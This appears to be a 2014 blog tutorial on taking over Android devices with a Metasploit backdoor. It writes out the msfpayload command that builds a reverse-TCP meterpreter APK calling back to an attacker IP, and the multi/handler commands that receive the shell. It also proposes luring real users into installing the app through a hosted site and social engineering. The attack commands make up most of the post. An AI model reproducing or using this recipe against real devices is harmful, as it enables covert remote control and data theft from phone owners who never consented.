Saturday, April 12, 2014

Hacking Android devices using Metasploit Backdoor

In this post we will see how to use backdoors generated by Metasploit to gain access into Android devices. I am using Nexux 7 Tablet as Victim.

SETUP DESCRIPTION
192.168.1.102 Victims IP Address (Android Nexus 7 Tablet)
192.168.1.140 Attackers IP Address (Metasploit)

I am using AirDroid App on Nexus 7 to download Metasploit backdoor (say, malicious App). In real scenarios we can host Web server with malicious app and entice users to install the app using various Social Engineering techniques.

BACKDOOR CREATION
Using Kali Linux with Metasploit Framework installed to generate the payload.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=4488 R > andr_bd.apk
msfpayload Metasploit command to create payloads (exe, java, apk etc.)
LHOST (local host) Attackers IP address for victim to connect back
LPORT (local port) port for victim to connect back
R msfpayload parameter indicates generation of raw payload
APK Application Package file

Successful execution of msfpayload will create andr_bd.apk App which is a Metasploit reverse TCP backdoor. When the app is installed on any android device, it will connect back to attackers IP address (192.168.1.140 here). Copy the App to Nexus 7 Tablet using AirDroid, install the app, successful installation will show the screen shot given below.

Before installing the App on Nexus 7 attacker need to run the following Metasploit commands for successful connection back of victim’s machine to attacker’s machine.
$ msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT
msf exploit(handler) > exploit 

We successfully got Metasploit’s meterpreter shell.

Post exploitation commands

Full paper can be accessed from
http://disects.com/whitepapers/Hacking_Android_devices_using_Metasploit_backdoors.pdf

Following articles might be of interest
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html